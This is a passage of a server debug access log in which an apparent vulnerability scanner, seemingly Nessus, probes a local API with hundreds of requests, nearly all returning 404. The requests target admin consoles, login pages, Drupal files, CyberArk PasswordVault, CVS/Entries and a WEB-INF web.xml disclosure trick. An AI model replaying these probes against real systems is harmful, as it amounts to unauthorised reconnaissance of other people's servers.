resCode: 200 +2022-10-31T22:39:31.845Z debug: [1667255971845, duration: 0] GET:/api/oo/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.878Z debug: [1667255971877, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.887Z debug: [1667255971886, duration: 1] GET:/api/xmldata?item=all, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.929Z debug: [1667255971927, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.936Z debug: [1667255971936, duration: 0] GET:/api/nnm/main, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.991Z debug: [1667255971989, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.999Z debug: [1667255971998, duration: 0] GET:/api/imc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.036Z debug: [1667255972034, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.044Z debug: [1667255972043, duration: 1] GET:/api/autopass/login_input, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.091Z debug: [1667255972090, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.098Z debug: [1667255972097, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.137Z debug: [1667255972135, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.144Z debug: [1667255972143, duration: 1] GET:/api/hazelcast/rest/cluster, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.186Z debug: [1667255972184, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.193Z debug: [1667255972192, duration: 1] GET:/api/public/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.226Z debug: [1667255972224, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.234Z debug: [1667255972233, duration: 0] GET:/api/com/novell/webaccess/WebAccessUninstall.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.262Z debug: [1667255972260, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.269Z debug: [1667255972268, duration: 0] GET:/api/servlet/webacc?error=webacc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.298Z debug: [1667255972296, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.309Z debug: [1667255972308, duration: 1] GET:/api/portal, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:32.346Z debug: [1667255972344, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:32.355Z debug: [1667255972354, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:33.772Z debug: [1667255973771, duration: 1] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:37.428Z debug: [1667255977426, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:37.436Z debug: [1667255977435, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:38.792Z debug: [1667255978791, duration: 0] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.502Z debug: [1667255982500, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.511Z debug: [1667255982510, duration: 1] GET:/api/users/sign_in, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.545Z debug: [1667255982544, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.554Z debug: [1667255982553, duration: 1] GET:/api/setup, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.594Z debug: [1667255982593, duration: 1] GET:/api/WEB-INF./web.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.617Z debug: [1667255982615, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.624Z debug: [1667255982623, duration: 1] GET:/api/ews/index.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.654Z debug: [1667255982652, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.660Z debug: [1667255982659, duration: 1] GET:/api/_vti_bin/shtml.dll/_vti_rpc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.695Z debug: [1667255982693, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.701Z debug: [1667255982700, duration: 0] GET:/api/_vti_bin/fpcount.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.733Z debug: [1667255982731, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.739Z debug: [1667255982738, duration: 1] GET:/api/system/console?version=1.5, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.745Z debug: [1667255982745, duration: 0] GET:/api/images/login_top.gif, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.758Z debug: [1667255982758, duration: 0] GET:/api/images/logon_merge.gif, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.765Z debug: [1667255982764, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.809Z debug: [1667255982807, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.817Z debug: [1667255982816, duration: 0] GET:/api/f360/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.825Z debug: [1667255982825, duration: 0] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.863Z debug: [1667255982859, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.874Z debug: [1667255982870, duration: 1] GET:/api/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.906Z debug: [1667255982904, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:42.917Z debug: [1667255982914, duration: 1] GET:/api/features, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:42.965Z debug: [1667255982962, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.004Z debug: [1667255983003, duration: 1] GET:/api/default.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.020Z debug: [1667255983019, duration: 0] GET:/api/fogbugz/default.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.064Z debug: [1667255983062, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.072Z debug: [1667255983070, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.106Z debug: [1667255983105, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.116Z debug: [1667255983114, duration: 1] GET:/api/login/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.150Z debug: [1667255983148, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.156Z debug: [1667255983156, duration: 0] GET:/api/acopia/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.185Z debug: [1667255983184, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.192Z debug: [1667255983191, duration: 0] GET:/api/ui/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.221Z debug: [1667255983220, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.228Z debug: [1667255983228, duration: 0] GET:/api/eonapi/getAuthenticationStatus, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.265Z debug: [1667255983263, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.271Z debug: [1667255983271, duration: 0] GET:/api/login.web, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.306Z debug: [1667255983305, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.312Z debug: [1667255983311, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.342Z debug: [1667255983341, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.348Z debug: [1667255983348, duration: 0] POST:/api/spipe?Source=nessus, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.378Z debug: [1667255983377, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.385Z debug: [1667255983384, duration: 1] GET:/api/PUBLIC/ADMIN/INDEX.HTM, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.422Z debug: [1667255983420, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.430Z debug: [1667255983429, duration: 0] GET:/api/SE/appInfo.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.437Z debug: [1667255983436, duration: 0] GET:/api/SE/EMC_SE.swf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.444Z debug: [1667255983443, duration: 0] GET:/api/SE/EMC_SE.swf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.495Z debug: [1667255983494, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.502Z debug: [1667255983501, duration: 0] GET:/api/RSAarcher/Default.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.509Z debug: [1667255983509, duration: 0] GET:/api/RSAarcher/Default.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.571Z debug: [1667255983569, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.577Z debug: [1667255983576, duration: 1] GET:/api/dtlt/home.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.617Z debug: [1667255983616, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.625Z debug: [1667255983623, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.628Z debug: [1667255983627, duration: 1] GET:/api/update.php?op=info, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.635Z debug: [1667255983634, duration: 1] GET:/api/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.641Z debug: [1667255983641, duration: 0] GET:/api/core/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.648Z debug: [1667255983647, duration: 0] GET:/api/drupal/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.656Z debug: [1667255983655, duration: 1] GET:/api/drupal/update.php?op=info, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.663Z debug: [1667255983662, duration: 1] GET:/api/drupal/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.669Z debug: [1667255983668, duration: 1] GET:/api/drupal/core/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.708Z debug: [1667255983706, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.714Z debug: [1667255983713, duration: 1] GET:/api/web/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.743Z debug: [1667255983741, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.750Z debug: [1667255983749, duration: 0] POST:/api/cgi-bin/mainfunction.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.792Z debug: [1667255983790, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.799Z debug: [1667255983798, duration: 0] GET:/api/_Fm5CEMB.ashx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.806Z debug: [1667255983805, duration: 1] GET:/api/l_JuqcXK.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.810Z debug: [1667255983809, duration: 0] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.814Z debug: [1667255983813, duration: 1] GET:/api/iRfpt9RM.asmx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.855Z debug: [1667255983854, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.861Z debug: [1667255983860, duration: 1] GET:/api/Qe_tgXBO.ashx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.869Z debug: [1667255983868, duration: 0] GET:/api/biGDQYap.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.880Z debug: [1667255983879, duration: 0] GET:/api/udv8X2Nk.asmx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.889Z debug: [1667255983888, duration: 0] GET:/api/wMITzBsl.rem, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.899Z debug: [1667255983898, duration: 0] GET:/api/QCMpULRy.soap, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:43.945Z debug: [1667255983943, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.952Z debug: [1667255983951, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:43.957Z debug: [1667255983956, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.005Z debug: [1667255984003, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.014Z debug: [1667255984013, duration: 0] GET:/api/oF33xqhV.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.060Z debug: [1667255984058, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.068Z debug: [1667255984067, duration: 1] GET:/api/syslog.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.109Z debug: [1667255984107, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.120Z debug: [1667255984119, duration: 1] GET:/api/devinfo.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.161Z debug: [1667255984159, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.168Z debug: [1667255984167, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.171Z debug: [1667255984171, duration: 0] GET:/api/api, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.237Z debug: [1667255984236, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.245Z debug: [1667255984243, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.296Z debug: [1667255984294, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.303Z debug: [1667255984302, duration: 1] GET:/api/servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.311Z debug: [1667255984310, duration: 1] GET:/api/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.360Z debug: [1667255984358, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.369Z debug: [1667255984368, duration: 0] GET:/api/about, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.401Z debug: [1667255984400, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.410Z debug: [1667255984409, duration: 0] GET:/api/common/about.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.442Z debug: [1667255984440, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.449Z debug: [1667255984448, duration: 0] GET:/api/test.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.471Z debug: [1667255984470, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.483Z debug: [1667255984482, duration: 1] GET:/api/PasswordVault/logon.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.493Z debug: [1667255984492, duration: 1] GET:/api/PasswordVault/auth/cyberark, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.545Z debug: [1667255984544, duration: 0] GET:/api/CVS/Entries, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.570Z debug: [1667255984569, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.580Z debug: [1667255984578, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.583Z debug: [1667255984582, duration: 0] GET:/api/rest-service/reviews-v1/versionInfo, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.617Z debug: [1667255984615, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.624Z debug: [1667255984623, duration: 0] GET:/api/crossdomain.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.655Z debug: [1667255984655, duration: 0] GET:/api/index.html?urlmaskfilter=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.712Z debug: [1667255984710, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.720Z debug: [1667255984719, duration: 0] GET:/api/servlet/webacc?User.lang=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.763Z debug: [1667255984762, duration: 0] GET:/api/popuplargeimage.asp?strImageTag=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.802Z debug: [1667255984800, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.809Z debug: [1667255984808, duration: 0] GET:/api/x471mqdy.asp?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.812Z debug: [1667255984811, duration: 1] GET:/api/x471mqdy.asp?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.816Z debug: [1667255984815, duration: 1] GET:/api/x471mqdy.aspx?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.820Z debug: [1667255984819, duration: 0] GET:/api/x471mqdy.aspx?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.824Z debug: [1667255984823, duration: 1] GET:/api/x471mqdy.pl?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.827Z debug: [1667255984826, duration: 1] GET:/api/x471mqdy.pl?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.830Z debug: [1667255984829, duration: 1] GET:/api/x471mqdy.cgi?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.832Z debug: [1667255984832, duration: 0] GET:/api/x471mqdy.cgi?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.835Z debug: [1667255984834, duration: 1] GET:/api/x471mqdy.exe?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.837Z debug: [1667255984836, duration: 1] GET:/api/x471mqdy.exe?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.840Z debug: [1667255984839, duration: 0] GET:/api/x471mqdy.cfm?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.842Z debug: [1667255984841, duration: 1] GET:/api/x471mqdy.cfm?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.844Z debug: [1667255984844, duration: 0] GET:/api/x471mqdy.html?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.852Z debug: [1667255984851, duration: 0] GET:/api/x471mqdy.html?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.854Z debug: [1667255984854, duration: 0] GET:/api/x471mqdy.jsp?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.857Z debug: [1667255984856, duration: 1] GET:/api/x471mqdy.jsp?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.859Z debug: [1667255984858, duration: 1] GET:/api/x471mqdy.php?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.862Z debug: [1667255984861, duration: 0] GET:/api/x471mqdy.php?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.864Z debug: [1667255984864, duration: 0] GET:/api/x471mqdy.php3?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.870Z debug: [1667255984869, duration: 1] GET:/api/x471mqdy.php3?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.876Z debug: [1667255984875, duration: 1] GET:/api/x471mqdy.cfc?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.879Z debug: [1667255984878, duration: 0] GET:/api/x471mqdy.cfc?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.881Z debug: [1667255984881, duration: 0] GET:/api/x471mqdy.nsf?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.884Z debug: [1667255984883, duration: 0] GET:/api/x471mqdy.nsf?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.886Z debug: [1667255984886, duration: 0] GET:/api/x471mqdy.dll?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.889Z debug: [1667255984889, duration: 0] GET:/api/x471mqdy.dll?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.894Z debug: [1667255984894, duration: 0] GET:/api/x471mqdy.fts?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.897Z debug: [1667255984897, duration: 0] GET:/api/x471mqdy.fts?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.900Z debug: [1667255984899, duration: 0] GET:/api/x471mqdy.jspa?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.903Z debug: [1667255984903, duration: 0] GET:/api/x471mqdy.jspa?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.907Z debug: [1667255984906, duration: 0] GET:/api/x471mqdy.kspx?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.910Z debug: [1667255984909, duration: 0] GET:/api/x471mqdy.kspx?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.914Z debug: [1667255984913, duration: 1] GET:/api/x471mqdy.mscgi?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.916Z debug: [1667255984916, duration: 0] GET:/api/x471mqdy.mscgi?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.920Z debug: [1667255984919, duration: 1] GET:/api/x471mqdy.do?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.922Z debug: [1667255984921, duration: 0] GET:/api/x471mqdy.do?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.926Z debug: [1667255984925, duration: 1] GET:/api/x471mqdy.htm?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.930Z debug: [1667255984930, duration: 0] GET:/api/x471mqdy.htm?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.934Z debug: [1667255984934, duration: 0] GET:/api/x471mqdy.idc?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.937Z debug: [1667255984937, duration: 0] GET:/api/x471mqdy.idc?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.939Z debug: [1667255984939, duration: 0] GET:/api/x471mqdy.x?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.941Z debug: [1667255984941, duration: 0] GET:/api/x471mqdy.x?, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:44.957Z debug: [1667255984956, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:44.972Z debug: [1667255984971, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.189Z debug: [1667255985188, duration: 0] GET:/api/ConsoleHelp/default.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.219Z debug: [1667255985218, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.226Z debug: [1667255985226, duration: 0] GET:/api/CFIDE/administrator/settings/version.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.260Z debug: [1667255985258, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.267Z debug: [1667255985266, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.305Z debug: [1667255985303, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.313Z debug: [1667255985311, duration: 1] GET:/api/cmf/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.345Z debug: [1667255985342, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.351Z debug: [1667255985351, duration: 0] GET:/api/clientaccesspolicy.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.381Z debug: [1667255985380, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.390Z debug: [1667255985389, duration: 1] GET:/api/Director, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.397Z debug: [1667255985396, duration: 1] GET:/api/DesktopDirector, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.430Z debug: [1667255985429, duration: 1] GET:/api/citrix/nfuse/default/login.asp?NFuse_LogoutId=&NFuse_MessageType=Error&NFuse_Message=&ClientDetection=ON, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.433Z debug: [1667255985432, duration: 1] GET:/api/citrix/MetaframeXP/default/login.asp?NFuse_LogoutId=&NFuse_MessageType=Error&NFuse_Message=&ClientDetection=ON, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.465Z debug: [1667255985463, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.471Z debug: [1667255985471, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.503Z debug: [1667255985501, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.510Z debug: [1667255985509, duration: 1] GET:/api/vpn/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.542Z debug: [1667255985540, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.549Z debug: [1667255985548, duration: 0] GET:/api/client/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.579Z debug: [1667255985577, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.585Z debug: [1667255985584, duration: 1] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.615Z debug: [1667255985614, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.623Z debug: [1667255985623, duration: 0] GET:/api/vsmc.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.656Z debug: [1667255985655, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.663Z debug: [1667255985663, duration: 0] GET:/api/ControllerWeb/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.701Z debug: [1667255985700, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.710Z debug: [1667255985709, duration: 0] GET:/api/app/ui/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.745Z debug: [1667255985742, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.754Z debug: [1667255985753, duration: 0] GET:/api/ui/faces/Login.xhtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.761Z debug: [1667255985760, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.805Z debug: [1667255985803, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.813Z debug: [1667255985810, duration: 2] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.848Z debug: [1667255985846, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.856Z debug: [1667255985855, duration: 1] GET:/api/system.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.892Z debug: [1667255985891, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.901Z debug: [1667255985900, duration: 1] GET:/api/getxml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:45.941Z debug: [1667255985939, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.949Z debug: [1667255985948, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.980Z debug: [1667255985978, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:45.988Z debug: [1667255985986, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.031Z debug: [1667255986029, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.038Z debug: [1667255986037, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.070Z debug: [1667255986068, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.077Z debug: [1667255986076, duration: 1] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.110Z debug: [1667255986109, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.119Z debug: [1667255986118, duration: 0] GET:/api/cwhp/CSMSDesktop/about.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.127Z debug: [1667255986126, duration: 1] GET:/api/CSCOnm/servlet/login/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.164Z debug: [1667255986162, duration: 